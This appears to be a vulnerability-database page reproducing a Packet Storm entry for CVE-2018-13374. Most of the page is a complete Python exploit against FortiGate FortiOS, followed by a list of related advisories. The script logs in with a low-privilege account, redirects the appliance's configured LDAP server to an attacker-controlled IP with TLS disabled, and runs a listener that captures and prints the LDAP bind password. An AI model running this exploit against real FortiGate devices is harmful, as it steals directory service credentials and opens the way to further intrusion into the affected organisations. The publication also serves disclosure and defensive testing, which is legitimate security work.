Lucene search

K

FortiGate FortiOS LDAP Credential Disclosure

🗓️ 16 Jan 2019 00:00:00Reported by Julio UrenaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 44 Views

FortiGate FortiOS LDAP Credential Disclosure via CVE-2018-13374 python script that exploits a vulnerability to extract LDAP credentials from FortiGate appliance. The script logs in to the FortiGate device using provided credentials and extracts LDAP configuration

Show more
Related
Code
ReporterTitlePublishedViews
Family
Fortinet
Protect
1 Jun 202100:00
fortinet
Check Point Advisories
Fortinet FortiOS Improper Access Control (CVE-2018-13374)
20 Sep 202200:00
checkpoint_advisories
CISA KEV Catalog
Fortinet FortiOS and FortiADC Improper Access Control Vulnerability
8 Sep 202200:00
cisa_kev
Exploit DB
Fortinet FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure
16 Jan 201900:00
exploitdb
Tenable Nessus
Fortinet FortiGate < 5.6.8 / 6.x < 6.0.3 LDAP Credential Disclosure (FG-IR-18-157)
24 Jan 201900:00
nessus
exploitpack
FortiGate FortiOS 6.0.3 - LDAP Credential Disclosure
16 Jan 201900:00
exploitpack
CVE
CVE-2018-13374
22 Jan 201914:29
cve
AttackerKB
CVE-2018-13374
22 Jan 201900:00
attackerkb
Prion
Improper access control
22 Jan 201914:29
prion
NVD
CVE-2018-13374
22 Jan 201914:29
nvd
Rows per page
`#/usr/bin/python3  
  
"""  
CVE-2018-13374  
Publicado por Julio UreA+-a (PlainText)  
Twitter: @JulioUrena  
Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/  
Referencia: https://fortiguard.com/psirt/FG-IR-18-157  
  
Ejemplo: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP   
Ejemplo con Proxy: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP --proxy http://127.0.0.1:8080  
"""  
  
from threading import Thread  
from time import sleep  
import json, requests, socket, sys, re, click  
  
# Disable SSL Warning  
requests.packages.urllib3.disable_warnings()  
  
# To keep the Cookies after login.  
s = requests.Session()  
  
def AccessFortiGate(fortigate_url, username, password, proxy_addr):  
url_login = fortigate_url+'/logincheck'  
  
# Pass username and Password  
payload = {"ajax": 1, "username":username, "secretkey":password}  
  
# verify=False - to avoid SSL warnings  
r = s.post(url_login, data=payload, proxies=proxy_addr, verify=False)  
  
if s.cookies:  
return True  
else:  
return False  
  
  
def TriggerVuln(fortigate_url, ip, proxy_addr):  
print("[+] Triggering Vulnerability")  
# Access LDAP Server TAB  
r = s.get(fortigate_url+'/p/user/ldap/json/',cookies=requests.utils.dict_from_cookiejar(s.cookies), proxies=proxy_addr, verify=False)  
  
# Load the response in a json object   
json_data = json.loads(r.text)  
  
# Assign values based on FortiGate LDAP configuration  
name = json_data['source'][0]['name']  
username = json_data['source'][0]['username']  
port = int(json_data['source'][0]['port'])  
cnid = json_data['source'][0]['cnid']  
dn = json_data['source'][0]['dn']  
ca = json_data['source'][0]['ca-cert']  
  
thread = Thread(target = GetCreds, args = (ip, port))  
thread.start()  
sleep(1)  
  
print("[+] Username: ", username)  
  
# Create json object for the vulnerable request, changing the server and setting up secure to 0  
ldap_request = {"info_only":1,"mkey":name,"ldap":{"server":ip,"port":port,"cn_id":cnid,"username":username,"dn":dn,"secure":0,"ca":ca,"type":2}}  
  
# Trigger the vulnerability  
r = s.get(fortigate_url+'/api/ldap?json='+str(ldap_request), cookies=requests.utils.dict_from_cookiejar(s.cookies),proxies=proxy_addr, verify=False)  
r.close()  
  
def GetCreds(server, port):  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
# Allow to reuse the server/port in case of: OSError: [Errno 98] Address already in use  
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  
  
server_address = (server, port)  
sock.bind(server_address)  
  
sock.listen()  
credentials = ''  
  
while True:  
print('[+] Waiting Fortigate connection ...')  
c, client_address = sock.accept()   
try:  
while True:  
data = c.recv(1024)  
credentials = str(data)  
# \\x80\\ was common with 3 different passwords / user names, that's why it's been used as reference.   
# It separe the username and the password  
ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace("'","")  
print("[+] Password: ", ldap_pass[3:-1])  
break  
finally:  
c.shutdown(socket.SHUT_RDWR)  
c.close()  
sock.shutdown(socket.SHUT_RDWR)  
sock.close()  
  
if credentials:  
break  
  
def print_help(self, param, value):  
if value is False:  
return  
click.echo(self.get_help())  
self.exit()  
  
@click.command()  
@click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True)  
@click.option('-u', '--username', 'username', help='Username to login into Fortigate. It can be a read only user.', required=True)  
@click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True)  
@click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True)  
@click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False)  
@click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False)  
@click.pass_context  
  
  
def main(self, fortigate_url, username, password, ip, proxy):  
if not fortigate_url and not username and not password:  
print_help(self, None, value=True)  
print("[-] For usage reference use --help")  
exit(0)  
  
# Configure Proxy For Web Requests  
proxy_addr = {  
'http': proxy,  
'https': proxy  
}  
message = """[+] CVE-2018-13374  
[+] Publicado por Julio UreA+-a (PlainText)  
[+] Blog: https://plaintext.do  
[+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157  
"""  
print(message)  
  
if AccessFortiGate(str(fortigate_url),username, password, proxy_addr):  
print("[+] Logged in.")  
sleep(1)  
TriggerVuln(str(fortigate_url), ip, proxy_addr)  
else:  
print("[-] Unable to login. Please check the credentials and Fortigate URL.")  
exit(0)  
  
if __name__ == "__main__":  
main()  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo